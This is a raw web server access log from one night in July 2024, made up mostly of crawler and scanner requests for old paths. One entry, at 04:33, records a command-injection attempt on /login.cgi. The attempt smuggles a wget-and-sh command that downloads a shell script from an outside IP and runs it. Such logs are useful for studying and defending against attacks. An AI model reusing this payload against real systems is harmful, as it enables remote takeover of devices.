156.59.198.135 - - [31/Jul/2024:02:00:35 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10433474.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Jul/2024:02:00:57 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11451552.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Jul/2024:02:03:03 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202108021603_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
149.50.103.48 - - [31/Jul/2024:02:05:08 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.136 - - [31/Jul/2024:02:05:45 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12205332.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Jul/2024:02:07:02 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12022371.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Jul/2024:02:09:38 +0200] "GET /renault.activities.at/htdocs/log/cron/pickupLogisticData_3115606.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Jul/2024:02:12:06 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202001151003_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Jul/2024:02:15:02 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202004171003_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Jul/2024:02:15:57 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202109221703_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.224.128.43 - - [31/Jul/2024:02:29:15 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [31/Jul/2024:02:31:54 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202101191503_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Jul/2024:02:37:12 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202006170903_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Jul/2024:02:37:42 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12148890.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Jul/2024:02:46:10 +0200] "GET /default/cgi-bin/lang/tooltips_w/awstats-tt-cn.txt HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Jul/2024:02:49:10 +0200] "GET /default/cgi-bin/lang/tooltips_w/awstats-tt-sr.txt HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
17.241.75.248 - - [31/Jul/2024:02:52:10 +0200] "GET /robots.txt HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.241.75.18 - - [31/Jul/2024:02:52:11 +0200] "GET /portal.php?sid=8d4cbcd8990df6dd9ce51a173a313566 HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
156.59.198.135 - - [31/Jul/2024:02:53:59 +0200] "GET /default/cgi-bin/lang/tooltips_m/awstats-tt-it.txt HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Jul/2024:03:03:54 +0200] "GET /default/cgi-bin/lang/tooltips_w/awstats-tt-br.txt HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Jul/2024:03:06:01 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/201911151603_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Jul/2024:03:15:06 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202008241103_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
149.50.103.48 - - [31/Jul/2024:03:23:35 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.135 - - [31/Jul/2024:03:32:01 +0200] "GET /renault.activities.at/htdocs/log/cron/check_inventory_days_3114861.txt HTTP/1.0" 404 326 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Jul/2024:03:34:11 +0200] "GET /renault.activities.at/htdocs/newsletter_log/nl_608190.txt HTTP/1.0" 404 316 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
167.94.146.56 - - [31/Jul/2024:03:45:12 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
167.94.146.56 - - [31/Jul/2024:03:45:15 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.56 - - [31/Jul/2024:03:45:15 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.56 - - [31/Jul/2024:03:45:15 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.56 - - [31/Jul/2024:03:45:15 +0200] "PRI * HTTP/2.0" 400 383 "-" "-"
198.235.24.36 - - [31/Jul/2024:03:45:35 +0200] "GET / HTTP/1.1" 200 274 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
156.59.198.135 - - [31/Jul/2024:03:46:21 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202109211103_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
92.249.48.202 - - [31/Jul/2024:03:47:47 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [31/Jul/2024:03:52:14 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202001071703_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Jul/2024:03:56:08 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10619199.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Jul/2024:03:56:29 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10433609.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Jul/2024:04:00:49 +0200] "GET /default/cgi-bin/lang/tooltips_m/awstats-tt-is.txt HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Jul/2024:04:03:40 +0200] "GET /default/cgi-bin/lang/tooltips_w/awstats-tt-ca.txt HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Jul/2024:04:04:26 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202107151303_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Jul/2024:04:06:22 +0200] "GET /renault.activities.at/htdocs/log/cron/reminder_mailing_3115077.txt HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
5.8.11.202 - - [31/Jul/2024:04:06:27 +0200] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
156.59.198.136 - - [31/Jul/2024:04:07:48 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11213691.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Jul/2024:04:11:10 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10668191.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Jul/2024:04:11:33 +0200] "GET /renault.activities.at/htdocs/log/cron/reminder_mailing_3115529.txt HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
5.8.11.202 - - [31/Jul/2024:04:13:59 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; U; Android 2.1-update1; de-de; HTC Desire 1.19.161.5 Build/ERE27) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17"
167.94.138.62 - - [31/Jul/2024:04:16:06 +0200] "\x16\x03\x01" 400 383 "-" "-"
156.59.198.135 - - [31/Jul/2024:04:31:45 +0200] "GET /renault.activities.at/htdocs/log/cron/system_mail_3116372.txt HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
37.139.5.66 - - [31/Jul/2024:04:33:40 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://193.35.18.164/klausschwab.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "linus-torvalds-loves-you"
156.59.198.136 - - [31/Jul/2024:04:39:29 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202005191103_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Jul/2024:04:40:31 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/201911061103_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Jul/2024:04:46:28 +0200] "GET /renault.activities.at/htdocs/newsletter_log/nl_608235.txt HTTP/1.0" 404 317 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
46.19.143.26 - - [31/Jul/2024:04:51:05 +0200] "GET / HTTP/1.1" 200 423 "-" "Hello World"
156.59.198.135 - - [31/Jul/2024:04:54:48 +0200] "GET /renault.activities.at/htdocs/log/cron/system_mail_3115164.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Jul/2024:04:55:34 +0200] "GET /default/cgi-bin/lang/tooltips_f/awstats-tt-it.txt HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Jul/2024:05:00:07 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202103101503_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
172.104.11.34 - - [31/Jul/2024:05:08:15 +0200] "\x16\x03\x01" 400 383 "-" "-"
47.128.34.4 - - [31/Jul/2024:05:08:16 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
87.236.176.94 - - [31/Jul/2024:05:08:16 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
87.236.176.152 - - [31/Jul/2024:05:08:16 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
47.128.18.230 - - [31/Jul/2024:05:10:04 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Jul/2024:05:11:08 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10969238.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Jul/2024:05:13:27 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202110191703_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
45.79.168.172 - - [31/Jul/2024:05:25:33 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
45.79.172.21 - - [31/Jul/2024:05:25:40 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
156.59.198.136 - - [31/Jul/2024:05:31:13 +0200] "GET /default/cgi-bin/lang/tooltips_w/awstats-tt-ro.txt HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Jul/2024:05:38:07 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11628921.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Jul/2024:05:41:40 +0200] "GET /renault.activities.at/htdocs/log/cron/system_mail_3114837.txt HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
17.241.227.161 - - [31/Jul/2024:05:42:45 +0200] "GET /index.php?sid=22bc6cc84270f0a86671480a995752da HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
156.59.198.136 - - [31/Jul/2024:05:43:06 +0200] "GET /renault.activities.at/htdocs/pdftest/data/LineBreak.txt HTTP/1.0" 404 313 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
45.156.129.48 - - [31/Jul/2024:05:50:30 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
156.59.198.135 - - [31/Jul/2024:05:50:48 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202106021003_RenOrder.xml HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Jul/2024:05:51:10 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11170987.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Jul/2024:05:51:34 +0200] "GET /renault.activities.at/htdocs/newsletter_log/nl_608247.txt HTTP/1.0" 404 317 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Jul/2024:05:55:27 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202012220803_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Jul/2024:05:55:48 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10742312.pdf HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Jul/2024:05:58:21 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202006260803_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Jul/2024:05:58:42 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10253942.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Jul/2024:05:59:25 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202109231003_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Jul/2024:06:01:32 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202010290903_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Jul/2024:06:04:37 +0200] "GET /default/cgi-bin/lang/tooltips_w/awstats-tt-fr.txt HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Jul/2024:06:07:13 +0200] "GET /default/cgi-bin/lang/tooltips_w/awstats-tt-kr.txt HTTP/1.0" 404 312 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Jul/2024:06:07:34 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10748623.pdf HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Jul/2024:06:09:24 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202011260903_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Jul/2024:06:09:45 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11671133.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Jul/2024:06:14:04 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10344794.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Jul/2024:06:14:26 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12239549.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Jul/2024:06:14:47 +0200] "GET /renault.activities.at/htdocs/log/cron/reminder_mailing_3115646.txt HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Jul/2024:06:37:14 +0200] "GET /renault.activities.at/htdocs/log/cron/shipp_Export_Data_3116248.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
5.8.11.202 - - [31/Jul/2024:06:38:19 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8"
156.59.198.136 - - [31/Jul/2024:06:41:22 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/201909040903_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Jul/2024:06:58:22 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202107011503_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Jul/2024:07:00:04 +0200] "GET /default/cgi-bin/lang/tooltips_w/awstats-tt-bg.txt HTTP/1.0" 404 312 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
149.50.103.48 - - [31/Jul/2024:07:10:14 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.136 - - [31/Jul/2024:07:11:00 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202011191303_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Jul/2024:07:11:21 +0200] "GET /default/cgi-bin/lang/tooltips_w/awstats-tt-sk.txt HTTP/1.0" 404 312 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Jul/2024:07:14:37 +0200] "GET /default/cgi-bin/lang/tooltips_w/awstats-tt-cz.txt HTTP/1.0" 404 312 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
17.241.227.88 - - [31/Jul/2024:07:23:54 +0200] "GET /viewtopic.php?f=8&t=492&sid=54df32ee0ee0f7bf8a54e23511949d55 HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
45.156.129.105 - - [31/Jul/2024:07:27:18 +0200] "GET /identity HTTP/1.1" 404 282 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.105 - - [31/Jul/2024:07:27:27 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
